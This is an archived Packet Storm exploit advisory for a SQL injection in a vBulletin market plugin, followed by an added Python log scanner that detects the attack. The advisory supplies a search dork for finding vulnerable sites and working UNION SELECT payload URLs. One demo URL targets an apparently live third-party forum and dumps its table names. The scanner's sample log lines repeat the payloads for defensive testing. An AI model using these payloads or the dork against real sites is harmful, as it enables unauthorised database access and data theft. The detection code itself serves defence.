Point Market System 3.1x SQL Injection

2011-04-10T00:00:00
ID PACKETSTORM:100255
Type packetstorm
Reporter Net.Edit0r
Modified 2011-04-10T00:00:00

Description

                                        
`#(+)Exploit Title: Point Market System 3.1x vBulletin plugin SQL Injection Vulnerability  
#(+)Author : Net.Edit0r  
#(+) E-mail : Black.hat.tm@Gmail.com  
#(+) dork : intext:Point Market System 3.1x  
#(+) Version : [3.1x]  
#(+) Category : Web Apps [SQL]  
#(+) Platform : Tested on: Linux  
#(+) Download plugin : http://www.megaupload.com/?d=2R592KO0  
  
____________________________________________________________________  
____________________________________________________________________  
  
A registered account on the site is required.  
  
The vulnerability is in the plugin file "market.php". You can eliminate  
it by removing the plugin.  
  
[~] Vulnerable File :  
  
# [+]http://localhost.com/market.php?do=cat&id=[SQL]  
  
[~] SQL injection Vulnerability  
  
# [+]-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--  
  
# [+]http://localhost.com/market.php?do=cat&id=-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--  
  
[~] Demo and Video :  
  
http://www.ehoza.com/v4/forum/market.php?do=cat&id=-1+union+select+1,group_concat%28table_name%29,3,4,5,6,@@version,8,9,10,11,12,13+from+information_schema.tables--  
  
Video : http://www.multiupload.com/S28Z2FCZQD  
  
[~] Full Info plugin Point Market  
  
http://www.vbulletin.org/forum/showthread.php?p=2159503#post2159503  
  
____________________________________________________________________  
____________________________________________________________________  
  
########################################################################  
(+)IRANIAN Young HackerZ # Persian Gulf  
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &  
3H34N & D3adly #BHG  
(+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ Virangar ~ S3cR3T ~ M4hd1  
~ Mikili ~ P0W3RFU7 ~ Ali.Erroor and all Friends  
(+)Gr33ts to : All Iranian HackerZ  
########################################################################  
`
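
A defender-side check for the request pattern this advisory describes, as an added example that is not part of the original advisory: it scans web access log lines for `market.php?do=cat` requests whose `id` is not a plain integer. The log lines, client addresses and `/forum/` path are constructed for illustration, and the rule that a legitimate category `id` is always an unsigned integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category id is an unsigned decimal integer.
INT_RE = re.compile(r"[0-9]+")


def suspicious_market_id(target):
    """Return the decoded id of a market.php?do=cat request whose id is not
    a plain integer, or None when the request looks normal or is unrelated."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/market.php"):
        return None
    # parse_qs decodes %xx escapes and '+' so encoded variants compare equal.
    params = parse_qs(parts.query)
    if params.get("do", [""])[0] != "cat":
        return None
    for value in params.get("id", []):
        if not INT_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_id) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_market_id(match.group(1))
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log (documentation IP ranges, made-up sizes and times).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2011:10:00:01 +0000] "GET /forum/market.php?do=cat&id=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Apr/2011:10:00:09 +0000] "GET /forum/market.php?do=cat&id=-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13-- HTTP/1.1" 200 4876',
    '198.51.100.7 - - [10/Apr/2011:10:00:12 +0000] "GET /forum/market.php?do=cat&id=-1%20union%20select%201,2,3,4,5,6,@@version,8,9,10,11,12,13-- HTTP/1.1" 200 4876',
    '192.0.2.10 - - [10/Apr/2011:10:00:15 +0000] "GET /forum/showthread.php?t=12 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}: non-integer id in market.php?do=cat -> {value!r}")
```

The check covers only the query string; an `id` sent in a POST body does not appear in a standard access log and needs application-level or WAF logging instead.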